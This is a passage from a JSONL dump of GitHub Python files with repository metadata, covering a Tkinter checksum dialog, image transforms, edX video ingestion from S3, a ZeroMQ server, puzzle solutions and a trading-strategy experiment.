= tk.StringVar(self, 'Checksum functions unavailable')\n self.cs.trace(\"w\", self.validate)\n\n # frames\n self.checksum_frame = tk.LabelFrame(self, text=\"Current random checksum\")\n self.button_frame = tk.Frame(self)\n\n # rename\n self.checksum_entry = tk.Entry(\n self.checksum_frame, textvariable=self.cs, justify='center')\n\n self.apply_button = tk.Button(\n self.button_frame, text=\"Apply to current map\",\n command=self.apply, width=20)\n\n # pack everything\n self.checksum_frame.pack(padx=4, expand=True, fill=\"x\", pady=2)\n self.button_frame.pack(expand=True, fill=\"x\")\n\n self.checksum_entry.pack(padx=4, pady=3, side='left',\n fill='x', expand=True)\n self.apply_button.pack(side='left', expand=True, padx=4)\n\n # make the window not show up on the start bar\n self.transient(self.master)\n\n if self.active_map:\n s = \"\"\n for c in \"%08x\" % self.active_map.map_header.crc32:\n s += c\n if len(s) % 3 == 2:\n s += \" \"\n self.cs.set(s[: 11])\n self.apply_style()\n\n def destroy(self):\n try: self.master.checksum_window = None\n except AttributeError: pass\n tk.Toplevel.destroy(self)\n\n def validate(self, *a):\n if self.active_map is None or self.validating:\n return\n\n self.validating = True\n try:\n s, ts = self.cs.get(), \"\"\n test = set(\"0123456789abcdefABCDEF\")\n spaces = 0\n for c in s:\n if c in test:\n ts += c\n if len(ts) % 3 == 2:\n ts += \" \"\n spaces += 1\n\n ts = ts[: 11]\n index = self.checksum_entry.index(tk.INSERT)\n self.checksum_entry.icursor(index + spaces)\n\n if len(ts.replace(\" \", \"\")) == 8:\n c = int(ts.replace(\" \", \"\"), 16)\n self.checksum_entry.config(bg=\"white\")\n else:\n self.checksum_entry.config(bg=\"red\")\n\n self.cs.set(ts)\n except Exception:\n print(format_exc())\n\n self.validating = False\n\n def apply(self, e=None):\n c = self.cs.get().replace(' ', '')\n if self.active_map is None or not c:\n return\n\n try:\n self.active_map.map_header.crc32 = int(c, 16)\n except Exception:\n return\n self.active_map.force_checksum = True\n self.destroy()\n","repo_name":"Sigmmma/refinery","sub_path":"refinery/windows/crc_window.py","file_name":"crc_window.py","file_ext":"py","file_size_in_byte":3421,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"91"} +{"seq_id":"6586854735","text":"from Notes import *\r\nfrom lxml import etree\r\nclass KeyboardBindings:\r\n\r\n def __init__(self, file):\r\n tree = etree.parse(file)\r\n letters = list()\r\n frequences = 
list()\r\n for letter in tree.xpath(\"/keyboardBindings/gamme/binding/letter\"):\r\n letters.append(letter.text)\r\n for note in tree.xpath(\"/keyboardBindings/gamme/binding/note\"):\r\n frequences.append(self.calculateFrequency(note.text))\r\n self.bindings = dict(zip(letters, frequences))\r\n\r\n def calculateFrequency(self, note):\r\n try:\r\n if note[0:-1] in Notes.NOTES.keys():\r\n return Notes.NOTES.get(note[0:-1])*2**int(note[-1:])\r\n else:\r\n raise Exception(\"Error with note format.\")\r\n except ValueError:\r\n print(\"Parse error from bindings file.\")\r\n\r\n def getFrequency(self, char):\r\n for letter in self.bindings.keys():\r\n if char in letter:\r\n return self.bindings.get(letter)\r\n return -1","repo_name":"MaxPoweur/AudioSynthesizer","sub_path":"KeyboardBindings.py","file_name":"KeyboardBindings.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"11667304488","text":"'''Image data transforms that can be applied after reading of raw data, before the application of the model\n\nWritten By: Anders Ohrn, October 2020\n\n'''\nfrom enum import Enum\nfrom torchvision import transforms\n\nclass GridMakerError(Exception):\n pass\n\nclass ZScoreConsts(Enum):\n '''Mean value to use for standard Z-score normalization, taken from https://pytorch.org/docs/stable/torchvision/models.html'''\n Z_MEAN = [0.485, 0.456, 0.406]\n '''Standard deviation values to use for standard Z-score normalization, taken from https://pytorch.org/docs/stable/torchvision/models.html'''\n Z_STD = [0.229, 0.224, 0.225]\n\n\nclass StandardTransform(object):\n '''Standard Image Transforms for pre-processing source image\n\n Args:\n min_dim (int): Length of shortest dimension of transformed image\n to_tensor (bool): If True, the output will be a PyTorch tensor, else PIL Image\n square (bool): If True, the source image (after resizing of shortest dimension) is cropped at the centre\n such that output image is square\n normalize (bool): If True, Z-score normalization is applied\n norm_mean : mean value for normalization of the R,G,B channels\n norm_std : std value for normalization of the R,G,B channels\n\n '''\n def __init__(self, min_dim=300, to_tensor=True, square=False,\n normalize=True, norm_mean=ZScoreConsts.Z_MEAN.value, norm_std=ZScoreConsts.Z_STD.value):\n\n ts = [transforms.ToPILImage(), transforms.Resize(min_dim)]\n if square:\n ts.append(transforms.CenterCrop(min_dim))\n if to_tensor:\n ts.append(transforms.ToTensor())\n if normalize:\n ts.append(transforms.Normalize(norm_mean, norm_std))\n\n self.transform_total = transforms.Compose(ts)\n\n def __call__(self, img):\n return self.transform_total(img)\n\n\nclass UnNormalizeTransform(object):\n '''Invert standard image normalization. 
Typically used in order to create image representation to be saved for\n visualization\n\n Args:\n norm_mean : mean value for normalization of the R,G,B channels\n norm_std : std value for normalization of the R,G,B channels\n\n '''\n def __init__(self, norm_mean=ZScoreConsts.Z_MEAN.value, norm_std=ZScoreConsts.Z_STD.value):\n self.transform_total = transforms.Normalize(mean=[-m / s for m, s in zip(norm_mean, norm_std)],\n std=[1.0 / s for s in norm_std])\n\n def __call__(self, img):\n return self.transform_total(img)\n\n\nclass DataAugmentTransform(object):\n '''Random Image Transforms for the purpose of data augmentation\n\n This class is not fully general, and assumes the input images have width 50% greater than height, which\n is true for fungi image dataset. Reuse this class with caution.\n\n Args:\n augmentation_label (str): Short-hand label for the type of augmentation transform to perform\n min_dim (int): Length of shortest dimension of transformed image\n to_tensor (bool): If True, the output will be a PyTorch tensor, else PIL Image\n normalize (bool): If True, Z-score normalization is applied\n norm_mean : mean value for normalization of the R,G,B channels\n norm_std : std value for normalization of the R,G,B channels\n\n '''\n def __init__(self, augmentation_label, min_dim=300, to_tensor=True, square=False,\n normalize=True, norm_mean=ZScoreConsts.Z_MEAN.value, norm_std=ZScoreConsts.Z_STD.value):\n\n ts = [transforms.ToPILImage(), transforms.Resize(min_dim)]\n if square:\n ts.append(transforms.CenterCrop(min_dim))\n\n if augmentation_label == 'random_resized_crop':\n ts.append(transforms.RandomResizedCrop((min_dim, int(min_dim * 1.5)), scale=(0.67,1.0)))\n elif augmentation_label == 'random_rotation':\n ts.append(transforms.RandomRotation(180.0))\n elif augmentation_label == 'random_resized_crop_rotation':\n ts.append(transforms.RandomResizedCrop((min_dim, int(min_dim * 1.5)), scale=(0.67, 1.0)))\n ts.append(transforms.RandomRotation(180.0))\n else:\n raise ValueError('Unknown augmentation label: {}'.format(augmentation_label))\n\n if to_tensor:\n ts.append(transforms.ToTensor())\n if normalize:\n ts.append(transforms.Normalize(norm_mean, norm_std))\n self.transform_total = transforms.Compose(ts)\n\n def __call__(self, img):\n return self.transform_total(img)\n\n\nclass OverlapGridTransform(object):\n '''Transformer of image to multiple image slices on a grid. The images slices can be overlapping.\n\n In order for the slicing of the image to add up the following equality must hold:\n `crop_dim + (img_n_splits - 1) * crop_step_size == img_input_dim`\n\n Args:\n img_input_dim (int): Length and height of square of source image to be sliced by grid. Defaults to 224.\n img_n_splits (int): Number of slices per side, thus total number of slices for one source image\n will be `img_n_splits * img_n_splits`. Defaults to 6.\n crop_step_size (int): Number of pixels between grid lines. Defaults to 32.\n crop_dim (int): Length and height of grid squares. 
Defaults to 64.\n norm_mean : mean value for normalization of the R,G,B channels\n norm_std : std value for normalization of the R,G,B channels\n\n Raises:\n GridMakerError: In case the grid cropping specifications are not adding up\n\n '''\n def __init__(self, img_input_dim=224, img_n_splits=6, crop_step_size=32, crop_dim=64,\n norm_mean=ZScoreConsts.Z_MEAN.value, norm_std=ZScoreConsts.Z_STD.value):\n\n if not crop_dim + (img_n_splits - 1) * crop_step_size == img_input_dim:\n raise GridMakerError('Image grid crop not possible: crop_dim + (img_n_splits - 1) * crop_step_size != img_input_dim')\n\n # Transformations of the source image: To PIL Image -> Resize shortest dimension -> Crop square at centre\n pre_transforms = []\n pre_transforms.append(transforms.ToPILImage())\n pre_transforms.append(transforms.Resize(img_input_dim))\n pre_transforms.append(transforms.CenterCrop(img_input_dim))\n self.pre_transforms = transforms.Compose(pre_transforms)\n\n # Transformations of the sliced grid image: To Tensor -> Z-Score Normalize RGB Channels\n post_transforms = []\n post_transforms.append(transforms.ToTensor())\n post_transforms.append(transforms.Normalize(norm_mean, norm_std))\n self.post_transforms = transforms.Compose(post_transforms)\n\n self.kwargs = []\n h_indices = range(img_n_splits)\n w_indices = range(img_n_splits)\n for h in h_indices:\n for w in w_indices:\n self.kwargs.append({'top' : h * crop_step_size,\n 'left' : w * crop_step_size,\n 'height' : crop_dim,\n 'width' : crop_dim})\n\n self.n_blocks = len(self.kwargs)\n\n def __call__(self, img):\n img_ = self.pre_transforms(img)\n return [self.post_transforms(transforms.functional.crop(img_, **kwarg)) for kwarg in self.kwargs]\n","repo_name":"anderzzz/monkey_caput","sub_path":"img_transforms.py","file_name":"img_transforms.py","file_ext":"py","file_size_in_byte":7264,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"91"} +{"seq_id":"39770748532","text":"from Backend.GraphQL.shared import query, get_current_user, get_user_document\nfrom Backend.DataTypes.Mention import Mention\nfrom Backend.DataTypes.MentionList import MentionList\nfrom graphql import GraphQLError\n\n@query.field(\"userMentions\")\ndef resolve_user_mentions(_, info):\n mentionarray = []\n current_user = get_current_user(info)\n try:\n user_doc, _ = get_user_document(current_user.uid)\n except Exception as err:\n return GraphQLError(message=err.__str__())\n\n mentions = user_doc.collection('mentions')\n mentions = [doc for doc in mentions.stream()]\n for mention in mentions:\n mention_dict = mention.to_dict()\n mentionarray.append(Mention(mention.id, mention_dict[\"createdAt\"], mention_dict[\"mentionData\"], mention_dict[\"mentioner\"], mention_dict[\"new\"]))\n return MentionList(mentionarray)","repo_name":"DigitalProductschool/rt-backend","sub_path":"Backend/GraphQL/queries/userMentions.py","file_name":"userMentions.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"28365818506","text":"\"\"\"\nmulti-point videofile discovery\nCurrently:\n Amazon S3 (studio-ingest as well as about/marketing\n video ingest\n )\n Local (watchfolder w/o edit priv.)\n\n\"\"\"\n\n\nimport json\nimport logging\nimport os.path\n\nimport boto\nimport boto.s3\nfrom boto.exception import NoAuthHandlerFound, S3DataError, S3ResponseError\nfrom opaque_keys import InvalidKeyError\nfrom opaque_keys.edx.keys import CourseKey\n\nfrom .control_env import 
*\nfrom VEDA.utils import extract_course_org, get_config\nfrom .veda_file_ingest import VedaIngest, VideoProto\nfrom VEDA_OS01.models import TranscriptCredentials\nfrom .veda_val import VALAPICall\n\ntry:\n boto.config.add_section('Boto')\nexcept:\n pass\nboto.config.set('Boto', 'http_socket_timeout', '100')\n\nlogging.basicConfig(level=logging.INFO)\nlogging.getLogger(\"requests\").setLevel(logging.WARNING)\nlogging.getLogger(\"boto\").setLevel(logging.ERROR)\nLOGGER = logging.getLogger(__name__)\n\n\nclass FileDiscovery(object):\n\n def __init__(self, **kwargs):\n self.video_info = {}\n self.auth_dict = get_config()\n self.bucket = None\n self.node_work_directory = kwargs.get('node_work_directory', WORK_DIRECTORY)\n\n # In stage, a course could possibly not exist in the local database\n # but remain referenced by edx-platform.\n # If the course doesn't exist but a course ID and hex is supplied,\n # create the course anyway.\n self.create_course_override = self.auth_dict['environment'] == \"stage\"\n\n\n def about_video_ingest(self):\n \"\"\"\n Crawl VEDA Upload bucket\n \"\"\"\n if self.node_work_directory is None:\n LOGGER.error('[DISCOVERY] No Workdir')\n return\n try:\n conn = boto.connect_s3()\n except NoAuthHandlerFound:\n LOGGER.error('[DISCOVERY] BOTO Auth Handler')\n return\n try:\n self.bucket = conn.get_bucket(self.auth_dict['veda_s3_upload_bucket'])\n except S3ResponseError:\n return None\n for key in self.bucket.list('upload/', '/'):\n meta = self.bucket.get_key(key.name)\n if meta.name != 'upload/':\n self.about_video_validate(\n meta=meta,\n key=key\n )\n\n def about_video_validate(self, meta, key):\n abvid_serial = meta.name.split('/')[1]\n upload_query = VedaUpload.objects.filter(\n video_serial=meta.name.split('/')[1]\n )\n if len(upload_query) == 0:\n # Non serialized upload - reject\n return\n\n upload_filename = upload_query[0].upload_filename\n\n if upload_filename is not None:\n file_extension = upload_filename.split('.')[-1]\n else:\n upload_filename = 'null_file_name.mp4'\n file_extension = 'mp4'\n\n if len(file_extension) > 4:\n file_extension = ''\n\n LOGGER.info('[ABOUT_DISCOVERY] upload_filename is: ' + upload_filename)\n meta.get_contents_to_filename(\n os.path.join(\n self.node_work_directory,\n upload_filename\n )\n )\n\n course_query = Course.objects.get(institution='EDX', edx_classid='ABVID')\n\n # Trigger Ingest Process\n V = VideoProto(\n abvid_serial=abvid_serial,\n client_title=upload_filename.replace('.' 
+ file_extension, ''),\n file_extension=file_extension,\n )\n\n I = VedaIngest(\n course_object=course_query,\n video_proto=V,\n node_work_directory=self.node_work_directory\n )\n I.insert()\n\n \"\"\"\n Move Key out of 'upload' folder\n \"\"\"\n new_key = '/'.join(('process', meta.name.split('/')[1]))\n key.copy(self.bucket, new_key)\n key.delete()\n\n reset_queries()\n\n def move_video(self, key, destination_dir):\n \"\"\"\n Moves an S3 video key to destination directory within the same bucket.\n\n Arguments:\n key: An S3 file key.\n destination_dir: target directory where the key will be moved eventually.\n \"\"\"\n new_key_name = os.path.join(destination_dir, os.path.basename(key.name))\n key.copy(self.bucket, new_key_name)\n key.delete()\n\n def reject_file_and_update_val(self, key, s3_filename, client_title, course_id):\n \"\"\"\n Moves a video file to rejected videos, update edx-val to 'invalid_token'.\n\n Arguments:\n key: An S3 key to be moved to /rejected\n s3_filename: Name of the file\n client_title: client title from Key's S3 metadata\n course_id: course run identifier\n \"\"\"\n video_proto = VideoProto(\n s3_filename=s3_filename,\n client_title=client_title,\n file_extension='',\n platform_course_url=course_id,\n video_orig_duration=0.0\n )\n # Update val status to 'invalid_token'\n VALAPICall(video_proto=video_proto, val_status=u'invalid_token').call()\n # Move the video file to 'edx-prod/rejected' directory.\n self.move_video(key, destination_dir=self.auth_dict['edx_s3_rejected_prefix'])\n\n def get_or_create_course(self, course_id, course_hex=None):\n \"\"\"\n Retrieves a course associated with course_hex, course_id or a creates new one.\n\n Arguments:\n course_id: course id identifying a course run\n course_hex: studio_hex identifying course runs\n\n Details:\n - if course_hex is there, try getting course with course_hex.\n - otherwise try making use of course_id to get the associated course\n and if no course is associated with the course_id, try creating\n a new course with course_name, institution, edx_classid and\n local_storedir.\n\n \"\"\"\n if not course_hex:\n try:\n course_key = CourseKey.from_string(course_id)\n except InvalidKeyError:\n return\n\n course = Course.objects.filter(institution=course_key.org, edx_classid=course_key.course).first()\n if course:\n course_runs = course.course_runs\n if course_id not in course_runs:\n course_runs.append(course_id)\n course.local_storedir = ','.join(course_runs)\n course.save()\n else:\n course = self._create_course(course_key, course_id)\n else:\n try:\n course = Course.objects.get(studio_hex=course_hex)\n except Course.DoesNotExist:\n if self.create_course_override:\n try:\n course_key = CourseKey.from_string(course_id)\n except InvalidKeyError:\n return\n\n course = self._create_course(course_key, course_id, course_hex)\n else:\n return\n\n return course\n\n def _create_course(self, course_key, course_id, studio_hex=None):\n \"\"\"\n Creates a course with the specified parameters.\n If another class needs to create a course, use get_or_create_course\n instead of this method.\n\n Arguments:\n - course_key\n - course_id\n - studio_hex\n \"\"\"\n course_name = '{org} {number}'.format(org=course_key.org, number=course_key.course)\n course = Course.objects.create(\n course_name=course_name,\n institution=course_key.org,\n edx_classid=course_key.course,\n local_storedir=course_id,\n yt_proc=False\n )\n\n if studio_hex:\n setattr(course, 'studio_hex', studio_hex)\n\n return course\n\n def 
download_video_to_working_directory(self, key, file_name):\n \"\"\"\n Downloads the video to working directory from S3 and\n returns whether its successfully downloaded or not.\n\n Arguments:\n key: An S3 key whose content is going to be downloaded\n file_name: Name of the file when its in working directory\n \"\"\"\n file_ingested = False\n try:\n key.get_contents_to_filename(os.path.join(self.node_work_directory, file_name))\n file_ingested = True\n except S3DataError:\n LOGGER.error('[DISCOVERY] Error downloading the file into node working directory.')\n return file_ingested\n\n def parse_transcript_preferences(self, course_id, transcript_preferences):\n \"\"\"\n Parses and validates transcript preferences.\n\n Arguments:\n course_id: course id identifying a course run.\n transcript_preferences: A serialized dict containing third party transcript preferences.\n \"\"\"\n try:\n transcript_preferences = json.loads(transcript_preferences)\n TranscriptCredentials.objects.get(\n org=extract_course_org(course_id),\n provider=transcript_preferences.get('provider')\n )\n except (TypeError, TranscriptCredentials.DoesNotExist):\n # when the preferences are not set OR these are set to some data in invalid format OR these don't\n # have associated 3rd party transcription provider API keys.\n transcript_preferences = None\n except ValueError:\n LOGGER.error('[DISCOVERY] Invalid transcripts preferences=%s', transcript_preferences)\n transcript_preferences = None\n\n return transcript_preferences\n\n def validate_metadata_and_feed_to_ingest(self, video_s3_key):\n \"\"\"\n Validates the video key and feed it to ingestion phase.\n\n Arguments:\n video_s3_key: An S3 Key associated with a (to be ingested)video file.\n\n Process/Steps:\n 1 - Get or create an associated course for a video.\n 2 - Download video to node working directory from S3.\n 3 - Check if this video has valid 3rd Party transcript provider along with the preferences.\n 4 - Set up an ingest instance and insert video to ingestion phase.\n 5 - On completing ingestion, mark the video file as processed.\n\n Note:\n Failure at any discovery point will cause video file to be marked as rejected.\n \"\"\"\n client_title = video_s3_key.get_metadata('client_video_id')\n course_hex = video_s3_key.get_metadata('course_video_upload_token')\n course_id = video_s3_key.get_metadata('course_key')\n transcript_preferences = video_s3_key.get_metadata('transcript_preferences')\n filename = os.path.basename(video_s3_key.name)\n\n # Try getting course based on the S3 metadata set on the video file.\n course = self.get_or_create_course(course_id, course_hex=course_hex)\n if course:\n # Download video file from S3 into node working directory.\n file_extension = os.path.splitext(client_title)[1][1:]\n file_downloaded = self.download_video_to_working_directory(video_s3_key, filename)\n if not file_downloaded:\n # S3 Bucket ingest failed, move the file rejected directory.\n self.move_video(video_s3_key, destination_dir=self.auth_dict['edx_s3_rejected_prefix'])\n return False\n\n # Prepare to ingest.\n video_metadata = dict(\n s3_filename=filename,\n client_title=client_title,\n file_extension=file_extension,\n platform_course_url=course_id,\n )\n # Check if this video also having valid 3rd party transcription preferences.\n transcript_preferences = self.parse_transcript_preferences(course_id, transcript_preferences)\n if transcript_preferences is not None:\n video_metadata.update({\n 'process_transcription': True,\n 'provider': 
transcript_preferences.get('provider'),\n 'three_play_turnaround': transcript_preferences.get('three_play_turnaround'),\n 'cielo24_turnaround': transcript_preferences.get('cielo24_turnaround'),\n 'cielo24_fidelity': transcript_preferences.get('cielo24_fidelity'),\n 'preferred_languages': transcript_preferences.get('preferred_languages'),\n 'source_language': transcript_preferences.get('video_source_language'),\n })\n\n ingest = VedaIngest(\n course_object=course,\n video_proto=VideoProto(**video_metadata),\n node_work_directory=self.node_work_directory\n )\n ingest.insert()\n\n if ingest.complete:\n # Move the video file into 'prod-edx/processed' or 'stage-edx/processed\n # directory, if ingestion is complete.\n self.move_video(video_s3_key, destination_dir=self.auth_dict['edx_s3_processed_prefix'])\n\n return ingest.complete\n else:\n # Reject the video file and update val status to 'invalid_token'\n self.reject_file_and_update_val(video_s3_key, filename, client_title, course_id)\n return False\n","repo_name":"edx-unsupported/edx-video-pipeline","sub_path":"control/veda_file_discovery.py","file_name":"veda_file_discovery.py","file_ext":"py","file_size_in_byte":13262,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"91"} +{"seq_id":"16689475387","text":"import zmq\nimport time \n\nport=\"5546\"\ncontext = zmq.Context()\nsocket=context.socket(zmq.REP)\nsocket.bind(\"tcp://*:%s\" % port)\n\nwhile True:\n message=socket.recv_string()\n print(message)\n time.sleep(1)\n send=\"got it\"\n socket.send_string(send)\n","repo_name":"alecbidaran/Python_excersies-","sub_path":"reqprep_server.py","file_name":"reqprep_server.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"12241213378","text":"import os\nfrom datetime import datetime, timezone\n\nlocal_time = datetime.now()\nutc_time = datetime.utcnow()\nlocal_tz = local_time.astimezone().tzinfo.tzname(local_time)\n\nprint(\"Hello, world!\")\nif \"GITHUB_WORKFLOW\" in os.environ:\n print(\n f\"GitHub workflow '{os.environ['GITHUB_WORKFLOW']}' triggered by '{os.environ['GITHUB_EVENT_NAME']}' via actor '{os.environ['GITHUB_ACTOR']}'\"\n )\nprint(f\"local time is: {local_time} {local_tz}\")\nprint(f\" utc time is: {utc_time} GMT\")\n","repo_name":"skullgoblet1089/test-workflows","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"70808448304","text":"#!/usr/bin/env python3\nimport dataclasses\n\nimport utils\nfrom year_2018.day_24 import part_a\n\n\nclass Challenge(utils.BaseChallenge):\n def solve(self, _input, debug=False):\n \"\"\"\n >>> Challenge().default_solve()\n 2344\n \"\"\"\n group_set = GroupSetExtended.from_groups_text(_input)\n smallest_required_boost = BoostSolver().find_smallest_required_boost(\n group_set, 'Immune System', debug=debug)\n boosted = group_set.boost(smallest_required_boost, 'Immune System')\n boosted.step_many(debug=debug)\n return boosted.get_unit_count()\n\n\nclass BoostSolver:\n def find_smallest_required_boost(self, group_set, benefactor, debug=False):\n is_boost_enough = self.get_is_boost_enough(group_set, benefactor)\n\n min_boost = 0\n if is_boost_enough(min_boost, debug=debug):\n return min_boost\n\n return utils.helper.find_smallest_required_value(\n min_boost, is_boost_enough,\n debug=debug)\n\n def get_is_boost_enough(self, 
group_set, benefactor):\n def is_boost_enough(boost, debug=False):\n boosted = group_set.boost(boost, benefactor)\n boosted.step_many(debug=debug)\n winning_side = boosted.get_winning_side()\n return winning_side == benefactor\n\n return is_boost_enough\n\n\nclass GroupSetExtended(part_a.GroupSet):\n def boost(self, boost, benefactor):\n cls = type(self)\n return cls([\n group.boost(boost)\n if group.faction == benefactor else\n group.copy()\n for group in self.groups\n ])\n\n def get_winning_side(self):\n remaining_factions = {\n group.faction\n for group in self.groups\n }\n if not remaining_factions:\n return None\n if len(remaining_factions) > 1:\n return None\n\n winning_side, = remaining_factions\n\n return winning_side\n\n\nclass GroupExtended(part_a.Group):\n def boost(self, boost):\n return dataclasses.replace(self, attack=self.attack + boost)\n\n def copy(self):\n return dataclasses.replace(self)\n\n\nGroupSetExtended.group_class = GroupExtended\n\n\nChallenge.main()\nchallenge = Challenge()\n","repo_name":"costas-basdekis/advent-of-code-submissions","sub_path":"year_2018/day_24/part_b.py","file_name":"part_b.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"31610773494","text":"#!/usr/bin/env python3\n\nimport sys\nimport math\n\nif len(sys.argv) > 1:\n infilename = sys.argv[1]\nelse:\n infilename = 'input.txt'\n\nwith open(infilename, 'r') as infile:\n buf = infile.read()\n\n# these are entirely for pretty-printing.\ndirections = (\"W\", \"S\", \"E\", \"N\") # start this at 0\n# what direction we're traveling. Follows the set above.\ndirection = 0\n# our current position on the map\npos = [1, 1]\n# how far we need to travel\ndist = 1\n# how far we've traveled in this direction\ndist_state = 0\n\n# a dict of previously seen coords and their values.\nstates = {(0,0):1, (1,0): 1, (1, 1): 2}\n\n# see the details of part 1 for how this works. 
This is just that same algorithm, but with caching of previous states, and then\n# figuring out which other previous positions we need to grab, and grabbing them and summing them.\n\nwhile True:\n # before east and west, we have to increment how far we travel, but only if we just turned.\n if direction % 2 == 0 and dist_state == 0:\n dist += 1\n\n # list of coords to fetch out of the lookup table and sum up.\n to_sum = []\n\n # west\n if direction == 0:\n pos[0] -= 1\n to_sum.append((pos[0] - 1, pos[1] - 1))\n to_sum.append((pos[0] , pos[1] - 1))\n to_sum.append((pos[0] + 1, pos[1] - 1))\n to_sum.append((pos[0] + 1, pos[1]))\n\n # south\n elif direction == 1:\n pos[1] -= 1\n to_sum.append((pos[0] , pos[1] + 1))\n to_sum.append((pos[0] + 1, pos[1] - 1))\n to_sum.append((pos[0] + 1, pos[1] ))\n to_sum.append((pos[0] + 1, pos[1] + 1))\n\n # east\n elif direction == 2:\n pos[0] += 1\n to_sum.append((pos[0] - 1, pos[1] + 1))\n to_sum.append((pos[0] , pos[1] + 1))\n to_sum.append((pos[0] + 1, pos[1] + 1))\n to_sum.append((pos[0] - 1, pos[1]))\n\n # north\n elif direction == 3:\n pos[1] += 1\n to_sum.append((pos[0] , pos[1] - 1))\n to_sum.append((pos[0] - 1, pos[1] - 1))\n to_sum.append((pos[0] - 1, pos[1] ))\n to_sum.append((pos[0] - 1, pos[1] + 1))\n\n # increment how far we've traveled in this direction\n dist_state += 1\n\n\n # grab the sum of the coords we need to sum up.\n total = 0\n for coord in to_sum:\n print(coord)\n if coord in states:\n total += states[coord]\n\n states [(pos[0], pos[1])] = total\n\n print(\"position: {}, direction: {}, dist_state: {}, dist: {}, total: {}\".format(\n pos,\n directions[direction],\n dist_state,\n dist,\n total\n ))\n\n # check for our finish condition\n if total > int(buf):\n print(total)\n break\n\n # check if we need to turn a corner.\n if dist == dist_state:\n dist_state = 0\n direction += 1\n direction %= 4\n","repo_name":"VisionistInc/advent-of-code-2017","sub_path":"joshgordon/03/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"91"} +{"seq_id":"24034471805","text":"# %%\nimport StrategyLearner as sl\nimport pandas as pd\nimport datetime as dt\nfrom marketsimcode import compute_portvals\nimport matplotlib.pyplot as plt\nimport ManualStrategy\n\n# %%\ndef author():\n return 'mwu344'\n\n# %%\ndef experiment1(debug=False):\n \n commission = 9.95\n impact = 0.005\n start_value = 100000\n start_date = dt.datetime(2008,1,1)\n end_date = dt.datetime(2009,12,31)\n\n ms = ManualStrategy.ManualStrategy()\n df_trades_ms = ms.testPolicy(symbol='JPM', sd=start_date, ed=end_date, sv=start_value)\n df_portval_ms = compute_portvals(df_trades_ms, commission=commission, impact=impact)\n\n learner = sl.StrategyLearner(verbose=False, impact=impact, commission=commission)\n learner.add_evidence(symbol='JPM', sd=start_date, ed=end_date, sv=start_value)\n df_trades_sl = learner.testPolicy(symbol='JPM', sd=start_date, ed=end_date, sv=start_value)\n df_portval_sl = compute_portvals(df_trades_sl, impact=impact, commission=commission)\n\n df_trades_bm = pd.DataFrame(0, index=df_trades_sl.index, columns=df_trades_sl.columns)\n df_trades_bm.iloc[0] = 1000\n df_portval_bm = compute_portvals(df_trades_bm, commission=commission, impact=impact)\n\n df_compare = pd.DataFrame(index=df_portval_sl.index, columns=['StrategyLearner', 'ManualStrategy', 'Benchmark'])\n df_compare.StrategyLearner = df_portval_sl / df_portval_sl.iloc[0]\n df_compare.ManualStrategy = 
df_portval_ms / df_portval_ms.iloc[0]\n df_compare.Benchmark = df_portval_bm / df_portval_bm.iloc[0]\n\n df_compare.plot()\n plt.xlabel('Date')\n plt.ylabel('Norm portfolio value')\n plt.grid()\n plt.title('Experiment 1')\n\n if debug:\n plt.show()\n else:\n plt.savefig('experiment1.png')\n\n# %%\nif __name__ == \"__main__\":\n\n experiment1(debug=True)\n","repo_name":"flowing-time/QLearning-Implementation-Application","sub_path":"experiment1.py","file_name":"experiment1.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"39323372102","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport sys\n\nfrom logging import getLogger, StreamHandler, NullHandler, DEBUG\nimport configparser\nfrom py4j.java_gateway import JavaGateway\nimport subprocess\nimport time\nimport glob\n\nsys.path.append(os.getcwd())\n\n# Logger setup\nlogger = getLogger(__name__)\nhandler = StreamHandler()\nhandler = NullHandler()\n# handler.setLevel(DEBUG)\nlogger.setLevel(DEBUG)\nlogger.addHandler(handler)\n\n# Load the config file\ninifile = configparser.ConfigParser()\ninifile.read(\"config.ini\")\n\n\n# Class that builds training data for seq2seq\nclass Data_Maker:\n skeleton_type = {\"MethodContent\": True,\n \"ClassContent\": True,\n \"CheckSemicolon\": True,\n \"CloseBracket\": True}\n\n def __init__(self, db,\n show_code=True, simple_mode=False,\n keyword=\"java\", debug_flag=False, art_id=-1):\n\n logger.debug(\"Data Maker initialized\")\n self.show_code = show_code\n self.simple_mode = simple_mode\n self.keyword = keyword\n\n self.scroll_size = 1000\n\n # For debug\n self.debug_flag = debug_flag\n self.art_id = art_id\n\n # Read settings from the config file\n self.out_path = inifile[\"Data_Maker\"][\"out_path\"]\n self.py4j_jar_path = inifile[\"Enviroment\"][\"py4j_jar_path\"] \n self.jar_path = inifile[\"Data_Maker\"][\"jar_path\"]\n self.base_info_dir = inifile[\"Data_Maker\"][\"base_info_dir\"]\n\n # Initialize the output files\n self.init_file(self.out_path)\n\n def run(self):\n # Start the Java gateway server\n # Run with the classpath specified\n args = ([\"java\",\n \"-cp\", self.py4j_jar_path,\n \"-jar\", self.jar_path])\n subprocess.Popen(args)\n\n # Prevent execution from continuing before the server has started\n time.sleep(3)\n gateway = JavaGateway(start_callback_server=True)\n app = gateway.entry_point\n\n print(\"Data Maker running\")\n\n\n # Read the intermediate data\n total = 0\n for directory in glob.glob(self.base_info_dir+\"/*\"):\n total += self.process_page(directory, app)\n print(\"total: {0}\".format(total))\n\n # Kill the process\n gateway.shutdown()\n\n def process_page(self, directory, app):\n q_source = \"\"\n a_source = 